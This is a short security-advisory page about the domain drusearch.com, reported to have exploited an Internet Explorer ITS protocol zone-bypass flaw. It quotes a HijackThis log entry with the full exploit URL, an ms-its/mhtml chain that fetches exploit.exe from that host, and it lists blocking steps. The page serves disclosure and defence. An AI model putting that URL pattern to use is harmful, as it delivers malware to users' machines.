Skip to content

drusearch.com

submitted by Roger Karlsson

drusearch.com seems to have been exploiting the Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability, based on the following Hijackthis log entry:

O16 - DPF: {11010101-1001-1111-1000-110112345679} - ms-its:mhtml:file://C:\MAIN.MHT!http://drusearch.com//my/EXPLOIT.CHM::/exploit.exe

Koffix offers you the possibility to:

  1. add drusearch.com to the restricted zone
  2. add drusearch.com to the HOSTS file

The information about drusearch.com is licensed under Creative Commons Attribution 2.5 License.

Comments

No comments posted yet.

Leave a reply